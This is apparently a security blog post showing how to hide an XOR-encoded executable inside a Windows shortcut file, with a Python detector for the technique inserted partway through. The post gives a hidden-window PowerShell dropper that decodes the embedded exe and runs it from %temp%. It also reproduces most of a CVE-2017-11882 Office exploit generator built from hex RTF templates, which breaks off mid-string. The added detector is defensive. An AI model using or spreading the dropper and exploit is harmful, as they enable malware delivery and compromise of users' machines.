Preface

This post borrows the idea of bundling an exe into an LNK file for execution, and uses the existing PoC code (the 605-byte and 17k-byte PoC versions) to implement local bundling. There are still many shortcomings that need fixing; this is only an experiment.

Local bundling

A shortcut file with the payload bundled into it, combined with the existing PoC code: a PowerShell command drops the bundled file and executes it.

Note:

  • PowerShell's Get-Content retrieves the content of the item at the specified location. gc, cat and type are aliases of this cmdlet.
  • If typing cmd.exe into cmd reports that the program cannot be run, check whether there is a stray cmd.exe in the current working directory and delete it.

Ideal code

Note: ^ is the cmd escape character; where it causes an error it can simply be removed.

cmd /c powershell -windowstyle hidden $lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq [TOTAL_LNK_FILE_SIZE]} ^| Select-Object -ExpandProperty Name; $file = gc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = '%temp%\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file^| select -Skip [LNK_FILE_SIZE_EXCLUDING_EXE])) -Encoding Byte; ^& $path;
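From the defender's side, the command line above is a useful detection target because it chains several stages that rarely occur together in legitimate automation: a hidden window, a raw-byte read of a .lnk, XOR decoding, an .exe dropped under %temp% after skipping a prefix, and invocation of the dropped path. The script below is an added example, not code from the original post: a small Python triage routine that scores process-creation command lines against those stages. The indicator patterns, the event records and the threshold are all constructed for this example; the first sample event reproduces the post's command line with the size placeholders filled in with arbitrary numbers.

```python
import re

# Each indicator covers one stage of the self-extracting LNK command line
# (constructed patterns, case-insensitive): hide the console, read a .lnk as
# raw bytes, XOR-decode it, drop an .exe under %temp%, strip the LNK prefix,
# and invoke the dropped path.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "lnk_raw_read": re.compile(r"\*\.lnk.*?\b(?:gc|cat|type|get-content)\b.*?-encoding\s+byte", re.I),
    "xor_decode": re.compile(r"-bxor\s+0x[0-9a-f]+", re.I),
    "temp_exe_drop": re.compile(r"%temp%.{0,80}?\.exe", re.I),
    "skip_prefix": re.compile(r"\bselect(?:-object)?\s+-skip\s+\d+", re.I),
    "invoke_dropped": re.compile(r"&\s*\$\w+\s*;?\s*$"),
}

def score_command_line(cmdline):
    """Return the names of the indicators present in one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]

def is_suspicious(cmdline, threshold=3):
    """Flag PowerShell command lines that show at least `threshold` stages;
    a single stage (e.g. a hidden window) is common in legitimate automation."""
    return "powershell" in cmdline.lower() and len(score_command_line(cmdline)) >= threshold

# Constructed process-creation events (image + command line), as a SIEM would
# hand them over. The first reproduces the command line from the post with the
# size placeholders filled with arbitrary numbers; the other two are benign.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r"powershell -windowstyle hidden $lnkpath = Get-ChildItem *.lnk | "
                 r"where-object {$_.length -eq 20480} | Select-Object -ExpandProperty Name; "
                 r"$file = gc $lnkpath -Encoding Byte; "
                 r"for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; "
                 r"$path = '%temp%\tmp' + (Get-Random) + '.exe'; "
                 r"sc $path ([byte[]]($file| select -Skip 4096)) -Encoding Byte; & $path;")},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -Command Get-Service | Where-Object {$_.Status -eq 'Running'}"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -windowstyle hidden -File C:\Scripts\nightly-backup.ps1"},
]

def triage(events):
    """Return (index, hits) for every event that trips the detector."""
    return [(i, score_command_line(e["cmdline"]))
            for i, e in enumerate(events) if is_suspicious(e["cmdline"])]

if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS):
        print(f"event {i}: {len(hits)} indicators -> {', '.join(hits)}")
```

The threshold matters: a hidden window or a `-bxor` on its own is not worth an alert, but three or more of these stages in one PowerShell command line is, and the script logs which stages matched so an analyst can see why.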

Actual use

Because of quote conflicts, in the PoC I use a long string to set the -c parameter directly to the required command.

#!/usr/bin/env python
# Original poc :https://github.com/embedi/CVE-2017-11882
# This version accepts a command up to 17967 bytes long.
# Sorry, I don't know how to read the struct in objdata, hence I cannot modify the length parameter to acquire arbitrary-length code execution.
# But that's enough for exploitation. I bet your shellcode is shorter.:)

__author__ = "@unamer"

import argparse
from struct import pack

head17k = r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 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
'''

tail17k = r'''000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C455049435400F6750000D58CFFFF6A2E00000800F6752B7300000100090000033117000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C024080006B1200000026060F001A00FFFFFFFF000010000000C0FFFFFF1E000000C06A00005E8000000B00000026060F000C004D617468547970650000E01F1C000000FB0280FE0000000000009001010000000402001054696D6573204E657720526F6D616E00FEFFFFFF21160A6300000A0000000000040000002D01000008000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A00000061616161616161616161080000
00320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320A087FBA340100000061000C000000320A087F3A2D0A000000616161616161616161610C000000320A087FBA250A000000616161616161616161610C000000320A087F3A1E0A000000616161616161616161610C000000320A087FBA160A000000616161616161616161610C000000320A087F3A0F0A000000616161616161616161610C000000320A087FBA070A000000616161616161616161610C000000320A087F3A000A0000006161616161616161616108000000320AC87CBA340100000061000C000000320AC87C3A2D0A000000616161616161616161610C000000320AC87CBA250A000000616161616161616161610C000000320AC87C3A1E0A000000616161616161616161610C000000320AC87CBA160A000000616161616161616161610C000000320AC87C3A0F0A000000616161616161616161610C000000320AC87CBA070A000000616161616161616161610C000000320AC87C3A000A0000006161616161616161616108000000320A887ABA340100000061790C000000320A887A3A2D0A000000616161616161616161610C000000320A887ABA250A000000616161616161616161610C000000320A887A3A1E0A0000006161616161
61616161610C000000320A887ABA160A000000616161616161616161610C000000320A887A3A0F0A000000616161616161616161610C000000320A887ABA070A000000616161616161616161610C000000320A887A3A000A0000006161616161616161616108000000320A4878BA340100000061000C000000320A48783A2D0A000000616161616161616161610C000000320A4878BA250A000000616161616161616161610C000000320A48783A1E0A000000616161616161616161610C000000320A4878BA160A000000616161616161616161610C000000320A48783A0F0A000000616161616161616161610C000000320A4878BA070A000000616161616161616161610C000000320A48783A000A0000006161616161616161616108000000320A0876BA340100000061000C000000320A08763A2D0A000000616161616161616161610C000000320A0876BA250A000000616161616161616161610C000000320A08763A1E0A000000616161616161616161610C000000320A0876BA160A000000616161616161616161610C000000320A08763A0F0A000000616161616161616161610C000000320A0876BA070A000000616161616161616161610C000000320A08763A000A0000006161616161616161616108000000320AC873BA340100000061000C000000320AC8733A2D0A000000616161616161616161610C000000320AC873BA250A000000616161616161616161610C000000320AC8733A1E0A000000616161616161616161610C000000320AC873BA160A000000616161616161616161610C000000320AC8733A0F0A000000616161616161616161610C000000320AC873BA070A000000616161616161616161610C000000320AC8733A000A0000006161616161616161616108000000320A8871BA340100000061000C000000320A88713A2D0A000000616161616161616161610C000000320A8871BA250A000000616161616161616161610C000000320A88713A1E0A000000616161616161616161610C000000320A8871BA160A000000616161616161616161610C000000320A88713A0F0A000000616161616161616161610C000000320A8871BA070A000000616161616161616161610C000000320A88713A000A0000006161616161616161616108000000320A486FBA340100000061000C000000320A486F3A2D0A000000616161616161616161610C000000320A486FBA250A000000616161616161616161610C000000320A486F3A1E0A000000616161616161616161610C000000320A486FBA160A000000616161616161616161610C000000320A486F3A0F0A000000616161616161616161610C000000320A486FBA070A000000616161616161616161610C0000
00320A486F3A000A0000006161616161616161616108000000320A086DBA340100000061000C000000320A086D3A2D0A000000616161616161616161610C000000320A086DBA250A000000616161616161616161610C000000320A086D3A1E0A000000616161616161616161610C000000320A086DBA160A000000616161616161616161610C000000320A086D3A0F0A000000616161616161616161610C000000320A086DBA070A000000616161616161616161610C000000320A086D3A000A0000006161616161616161616108000000320AC86ABA340100000061000C000000320AC86A3A2D0A000000616161616161616161610C000000320AC86ABA250A000000616161616161616161610C000000320AC86A3A1E0A000000616161616161616161610C000000320AC86ABA160A000000616161616161616161610C000000320AC86A3A0F0A000000616161616161616161610C000000320AC86ABA070A000000616161616161616161610C000000320AC86A3A000A0000006161616161616161616108000000320A8868BA340100000061000C000000320A88683A2D0A000000616161616161616161610C000000320A8868BA250A000000616161616161616161610C000000320A88683A1E0A000000616161616161616161610C000000320A8868BA160A000000616161616161616161610C000000320A88683A0F0A000000616161616161616161610C000000320A8868BA070A000000616161616161616161610C000000320A88683A000A0000006161616161616161616108000000320A4866BA340100000061000C000000320A48663A2D0A000000616161616161616161610C000000320A4866BA250A000000616161616161616161610C000000320A48663A1E0A000000616161616161616161610C000000320A4866BA160A000000616161616161616161610C000000320A48663A0F0A000000616161616161616161610C000000320A4866BA070A000000616161616161616161610C000000320A48663A000A0000006161616161616161616108000000320A0864BA340100000061000C000000320A08643A2D0A000000616161616161616161610C000000320A0864BA250A000000616161616161616161610C000000320A08643A1E0A000000616161616161616161610C000000320A0864BA160A000000616161616161616161610C000000320A08643A0F0A000000616161616161616161610C000000320A0864BA070A000000616161616161616161610C000000320A08643A000A0000006161616161616161616108000000320AC861BA340100000061000C000000320AC8613A2D0A000000616161616161616161610C000000320AC861BA250A0000006161616161
61616161610C000000320AC8613A1E0A000000616161616161616161610C000000320AC861BA160A000000616161616161616161610C000000320AC8613A0F0A000000616161616161616161610C000000320AC861BA070A000000616161616161616161610C000000320AC8613A000A0000006161616161616161616108000000320A885FBA340100000061000C000000320A885F3A2D0A000000616161616161616161610C000000320A885FBA250A000000616161616161616161610C000000320A885F3A1E0A000000616161616161616161610C000000320A885FBA160A000000616161616161616161610C000000320A885F3A0F0A000000616161616161616161610C000000320A885FBA070A000000616161616161616161610C000000320A885F3A000A0000006161616161616161616108000000320A485DBA340100000061000C000000320A485D3A2D0A000000616161616161616161610C000000320A485DBA250A000000616161616161616161610C000000320A485D3A1E0A000000616161616161616161610C000000320A485DBA160A000000616161616161616161610C000000320A485D3A0F0A000000616161616161616161610C000000320A485DBA070A000000616161616161616161610C000000320A485D3A000A0000006161616161616161616108000000320A085BBA340100000061000C000000320A085B3A2D0A000000616161616161616161610C000000320A085BBA250A000000616161616161616161610C000000320A085B3A1E0A000000616161616161616161610C000000320A085BBA160A000000616161616161616161610C000000320A085B3A0F0A000000616161616161616161610C000000320A085BBA070A000000616161616161616161610C000000320A085B3A000A0000006161616161616161616108000000320AC858BA340100000061000C000000320AC8583A2D0A000000616161616161616161610C000000320AC858BA250A000000616161616161616161610C000000320AC8583A1E0A000000616161616161616161610C000000320AC858BA160A000000616161616161616161610C000000320AC8583A0F0A000000616161616161616161610C000000320AC858BA070A000000616161616161616161610C000000320AC8583A000A0000006161616161616161616108000000320A8856BA340100000061000C000000320A88563A2D0A000000616161616161616161610C000000320A8856BA250A000000616161616161616161610C000000320A88563A1E0A000000616161616161616161610C000000320A8856BA160A000000616161616161616161610C000000320A88563A0F0A000000616161616161616161610C0000
00320A8856BA070A000000616161616161616161610C000000320A88563A000A0000006161616161616161616108000000320A4854BA340100000061000C000000320A48543A2D0A000000616161616161616161610C000000320A4854BA250A000000616161616161616161610C000000320A48543A1E0A000000616161616161616161610C000000320A4854BA160A000000616161616161616161610C000000320A48543A0F0A000000616161616161616161610C000000320A4854BA070A000000616161616161616161610C000000320A48543A000A0000006161616161616161616108000000320A0852BA340100000061000C000000320A08523A2D0A000000616161616161616161610C000000320A0852BA250A000000616161616161616161610C000000320A08523A1E0A000000616161616161616161610C000000320A0852BA160A000000616161616161616161610C000000320A08523A0F0A000000616161616161616161610C000000320A0852BA070A000000616161616161616161610C000000320A08523A000A0000006161616161616161616108000000320AC84FBA340100000061000C000000320AC84F3A2D0A000000616161616161616161610C000000320AC84FBA250A000000616161616161616161610C000000320AC84F3A1E0A000000616161616161616161610C000000320AC84FBA160A000000616161616161616161610C000000320AC84F3A0F0A000000616161616161616161610C000000320AC84FBA070A000000616161616161616161610C000000320AC84F3A000A0000006161616161616161616108000000320A884DBA340100000061000C000000320A884D3A2D0A000000616161616161616161610C000000320A884DBA250A000000616161616161616161610C000000320A884D3A1E0A000000616161616161616161610C000000320A884DBA160A000000616161616161616161610C000000320A884D3A0F0A000000616161616161616161610C000000320A884DBA070A000000616161616161616161610C000000320A884D3A000A0000006161616161616161616108000000320A484BBA340100000061000C000000320A484B3A2D0A000000616161616161616161610C000000320A484BBA250A000000616161616161616161610C000000320A484B3A1E0A000000616161616161616161610C000000320A484BBA160A000000616161616161616161610C000000320A484B3A0F0A000000616161616161616161610C000000320A484BBA070A000000616161616161616161610C000000320A484B3A000A0000006161616161616161616108000000320A0849BA340100000061000C000000320A08493A2D0A0000006161616161
61616161610C000000320A0849BA250A000000616161616161616161610C000000320A08493A1E0A000000616161616161616161610C000000320A0849BA160A000000616161616161616161610C000000320A08493A0F0A000000616161616161616161610C000000320A0849BA070A000000616161616161616161610C000000320A08493A000A0000006161616161616161616108000000320AC846BA340100000061000C000000320AC8463A2D0A000000616161616161616161610C000000320AC846BA250A000000616161616161616161610C000000320AC8463A1E0A000000616161616161616161610C000000320AC846BA160A000000616161616161616161610C000000320AC8463A0F0A000000616161616161616161610C000000320AC846BA070A000000616161616161616161610C000000320AC8463A000A0000006161616161616161616108000000320A8844BA340100000061000C000000320A88443A2D0A000000616161616161616161610C000000320A8844BA250A000000616161616161616161610C000000320A88443A1E0A000000616161616161616161610C000000320A8844BA160A000000616161616161616161610C000000320A88443A0F0A000000616161616161616161610C000000320A8844BA070A000000616161616161616161610C000000320A88443A000A0000006161616161616161616108000000320A4842BA340100000061000C000000320A48423A2D0A000000616161616161616161610C000000320A4842BA250A000000616161616161616161610C000000320A48423A1E0A000000616161616161616161610C000000320A4842BA160A000000616161616161616161610C000000320A48423A0F0A000000616161616161616161610C000000320A4842BA070A000000616161616161616161610C000000320A48423A000A0000006161616161616161616108000000320A0840BA340100000061000C000000320A08403A2D0A000000616161616161616161610C000000320A0840BA250A000000616161616161616161610C000000320A08403A1E0A000000616161616161616161610C000000320A0840BA160A000000616161616161616161610C000000320A08403A0F0A000000616161616161616161610C000000320A0840BA070A000000616161616161616161610C000000320A08403A000A0000006161616161616161616108000000320AC83DBA340100000061000C000000320AC83D3A2D0A000000616161616161616161610C000000320AC83DBA250A000000616161616161616161610C000000320AC83D3A1E0A000000616161616161616161610C000000320AC83DBA160A000000616161616161616161610C0000
00320AC83D3A0F0A000000616161616161616161610C000000320AC83DBA070A000000616161616161616161610C000000320AC83D3A000A0000006161616161616161616108000000320A883BBA340100000061000C000000320A883B3A2D0A000000616161616161616161610C000000320A883BBA250A000000616161616161616161610C000000320A883B3A1E0A000000616161616161616161610C000000320A883BBA160A000000616161616161616161610C000000320A883B3A0F0A000000616161616161616161610C000000320A883BBA070A000000616161616161616161610C000000320A883B3A000A0000006161616161616161616108000000320A4839BA340100000061000C000000320A48393A2D0A000000616161616161616161610C000000320A4839BA250A000000616161616161616161610C000000320A48393A1E0A000000616161616161616161610C000000320A4839BA160A000000616161616161616161610C000000320A48393A0F0A000000616161616161616161610C000000320A4839BA070A000000616161616161616161610C000000320A48393A000A0000006161616161616161616108000000320A0837BA340100000061000C000000320A08373A2D0A000000616161616161616161610C000000320A0837BA250A000000616161616161616161610C000000320A08373A1E0A000000616161616161616161610C000000320A0837BA160A000000616161616161616161610C000000320A08373A0F0A000000616161616161616161610C000000320A0837BA070A000000616161616161616161610C000000320A08373A000A0000006161616161616161616108000000320AC834BA340100000061000C000000320AC8343A2D0A000000616161616161616161610C000000320AC834BA250A000000616161616161616161610C000000320AC8343A1E0A000000616161616161616161610C000000320AC834BA160A000000616161616161616161610C000000320AC8343A0F0A000000616161616161616161610C000000320AC834BA070A000000616161616161616161610C000000320AC8343A000A0000006161616161616161616108000000320A8832BA340100000061790C000000320A88323A2D0A000000616161616161616161610C000000320A8832BA250A000000616161616161616161610C000000320A88323A1E0A000000616161616161616161610C000000320A8832BA160A000000616161616161616161610C000000320A88323A0F0A000000616161616161616161610C000000320A8832BA070A000000616161616161616161610C000000320A88323A000A0000006161616161616161616108000000320A4830BA3401
00000061000C000000320A48303A2D0A000000616161616161616161610C000000320A4830BA250A000000616161616161616161610C000000320A48303A1E0A000000616161616161616161610C000000320A4830BA160A000000616161616161616161610C000000320A48303A0F0A000000616161616161616161610C000000320A4830BA070A000000616161616161616161610C000000320A48303A000A0000006161616161616161616108000000320A082EBA340100000061000C000000320A082E3A2D0A000000616161616161616161610C000000320A082EBA250A000000616161616161616161610C000000320A082E3A1E0A000000616161616161616161610C000000320A082EBA160A000000616161616161616161610C000000320A082E3A0F0A000000616161616161616161610C000000320A082EBA070A000000616161616161616161610C000000320A082E3A000A0000006161616161616161616108000000320AC82BBA340100000061000C000000320AC82B3A2D0A000000616161616161616161610C000000320AC82BBA250A000000616161616161616161610C000000320AC82B3A1E0A000000616161616161616161610C000000320AC82BBA160A000000616161616161616161610C000000320AC82B3A0F0A000000616161616161616161610C000000320AC82BBA070A000000616161616161616161610C000000320AC82B3A000A0000006161616161616161616108000000320A8829BA340100000061000C000000320A88293A2D0A000000616161616161616161610C000000320A8829BA250A000000616161616161616161610C000000320A88293A1E0A000000616161616161616161610C000000320A8829BA160A000000616161616161616161610C000000320A88293A0F0A000000616161616161616161610C000000320A8829BA070A000000616161616161616161610C000000320A88293A000A0000006161616161616161616108000000320A48273A690200000061610C000000320A4827BA610A000000616161616161616161610C000000320A48273A5A0A000000616161616161616161610C000000320A4827BA520A000000616161616161616161610C000000320A48273A4B0A000000616161616161616161610C000000320A4827BA430A000000616161616161616161610C000000320A48273A3C0A000000616161616161616161610C000000320A4827BA340A000000616161616161616161610C000000320A48273A2D0A000000616161616161616161610C000000320A4827BA250A000000616161616161616161610C000000320A48273A1E0A000000616161616161616161610C000000320A4827BA160A0000006161616161
61616161610C000000320A48273A0F0A000000616161616161616161610C000000320A4827BA070A000000616161616161616161610C000000320A48273A000A0000006161616161616161616108000000320A0825BA340100000061610C000000320A08253A2D0A000000616161616161616161610C000000320A0825BA250A000000616161616161616161610C000000320A08253A1E0A000000616161616161616161610C000000320A0825BA160A000000616161616161616161610C000000320A08253A0F0A000000616161616161616161610C000000320A0825BA070A000000616161616161616161610C000000320A08253A000A0000006161616161616161616108000000320AC822BA340100000061000C000000320AC8223A2D0A000000616161616161616161610C000000320AC822BA250A000000616161616161616161610C000000320AC8223A1E0A000000616161616161616161610C000000320AC822BA160A000000616161616161616161610C000000320AC8223A0F0A000000616161616161616161610C000000320AC822BA070A000000616161616161616161610C000000320AC8223A000A0000006161616161616161616108000000320A8820BA340100000061000C000000320A88203A2D0A000000616161616161616161610C000000320A8820BA250A000000616161616161616161610C000000320A88203A1E0A000000616161616161616161610C000000320A8820BA160A000000616161616161616161610C000000320A88203A0F0A000000616161616161616161610C000000320A8820BA070A000000616161616161616161610C000000320A88203A000A0000006161616161616161616108000000320A481EBA340100000061610C000000320A481E3A2D0A000000616161616161616161610C000000320A481EBA250A000000616161616161616161610C000000320A481E3A1E0A000000616161616161616161610C000000320A481EBA160A000000616161616161616161610C000000320A481E3A0F0A000000616161616161616161610C000000320A481EBA070A000000616161616161616161610C000000320A481E3A000A0000006161616161616161616108000000320A081CBA340100000061000C000000320A081C3A2D0A000000616161616161616161610C000000320A081CBA250A000000616161616161616161610C000000320A081C3A1E0A000000616161616161616161610C000000320A081CBA160A000000616161616161616161610C000000320A081C3A0F0A000000616161616161616161610C000000320A081CBA070A000000616161616161616161610C000000320A081C3A000A00000061616161616161616161080000
00320AC819BA340100000061000C000000320AC8193A2D0A000000616161616161616161610C000000320AC819BA250A000000616161616161616161610C000000320AC8193A1E0A000000616161616161616161610C000000320AC819BA160A000000616161616161616161610C000000320AC8193A0F0A000000616161616161616161610C000000320AC819BA070A000000616161616161616161610C000000320AC8193A000A0000006161616161616161616108000000320A8817BA340100000061610C000000320A88173A2D0A000000616161616161616161610C000000320A8817BA250A000000616161616161616161610C000000320A88173A1E0A000000616161616161616161610C000000320A8817BA160A000000616161616161616161610C000000320A88173A0F0A000000616161616161616161610C000000320A8817BA070A000000616161616161616161610C000000320A88173A000A0000006161616161616161616108000000320A4815BA340100000061000C000000320A48153A2D0A000000616161616161616161610C000000320A4815BA250A000000616161616161616161610C000000320A48153A1E0A000000616161616161616161610C000000320A4815BA160A000000616161616161616161610C000000320A48153A0F0A000000616161616161616161610C000000320A4815BA070A000000616161616161616161610C000000320A48153A000A0000006161616161616161616108000000320A0813BA340100000061610C000000320A08133A2D0A000000616161616161616161610C000000320A0813BA250A000000616161616161616161610C000000320A08133A1E0A000000616161616161616161610C000000320A0813BA160A000000616161616161616161610C000000320A08133A0F0A000000616161616161616161610C000000320A0813BA070A000000616161616161616161610C000000320A08133A000A0000006161616161616161616108000000320AC810BA340100000061000C000000320AC8103A2D0A000000616161616161616161610C000000320AC810BA250A000000616161616161616161610C000000320AC8103A1E0A000000616161616161616161610C000000320AC810BA160A000000616161616161616161610C000000320AC8103A0F0A000000616161616161616161610C000000320AC810BA070A000000616161616161616161610C000000320AC8103A000A0000006161616161616161616108000000320A880EBA340100000061000C000000320A880E3A2D0A000000616161616161616161610C000000320A880EBA250A000000616161616161616161610C000000320A880E3A1E0A0000006161616161
61616161610C000000320A880EBA160A000000616161616161616161610C000000320A880E3A0F0A000000616161616161616161610C000000320A880EBA070A000000616161616161616161610C000000320A880E3A000A0000006161616161616161616108000000320A480CBA340100000061000C000000320A480C3A2D0A000000616161616161616161610C000000320A480CBA250A000000616161616161616161610C000000320A480C3A1E0A000000616161616161616161610C000000320A480CBA160A000000616161616161616161610C000000320A480C3A0F0A000000616161616161616161610C000000320A480CBA070A000000616161616161616161610C000000320A480C3A000A0000006161616161616161616108000000320A080ABA340100000061610C000000320A080A3A2D0A000000616161616161616161610C000000320A080ABA250A000000616161616161616161610C000000320A080A3A1E0A000000616161616161616161610C000000320A080ABA160A000000616161616161616161610C000000320A080A3A0F0A000000616161616161616161610C000000320A080ABA070A000000616161616161616161610C000000320A080A3A000A0000006161616161616161616108000000320AC807BA340100000061000C000000320AC8073A2D0A000000616161616161616161610C000000320AC807BA250A000000616161616161616161610C000000320AC8073A1E0A000000616161616161616161610C000000320AC807BA160A000000616161616161616161610C000000320AC8073A0F0A000000616161616161616161610C000000320AC807BA070A000000616161616161616161610C000000320AC8073A000A0000006161616161616161616108000000320A8805BA340100000061000C000000320A88053A2D0A000000616161616161616161610C000000320A8805BA250A000000616161616161616161610C000000320A88053A1E0A000000616161616161616161610C000000320A8805BA160A000000616161616161616161610C000000320A88053A0F0A000000616161616161616161610C000000320A8805BA070A000000616161616161616161610C000000320A88053A000A0000006161616161616161616108000000320A4803BA340100000061000C000000320A48033A2D0A000000616161616161616161610C000000320A4803BA250A000000616161616161616161610C000000320A48033A1E0A000000616161616161616161610C000000320A4803BA160A000000616161616161616161610C000000320A48033A0F0A000000616161616161616161610C000000320A4803BA070A000000616161616161616161610C0000
00320A48033A000A0000006161616161616161616108000000320A0801BA340100000061610C000000320A08013A2D0A000000616161616161616161610C000000320A0801BA250A000000616161616161616161610C000000320A08013A1E0A000000616161616161616161610C000000320A0801BA160A000000616161616161616161610C000000320A08013A0F0A000000616161616161616161610C000000320A0801BA070A000000616161616161616161610C000000320A08013A000A000000616161616161616161610A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000860102022253797374656D000021008A0200000A00CD1166F121008A02FFFFFFFF78EF1900040000002D01010004000000F0010000030000000000
}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
\par}
'''

head605 = r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF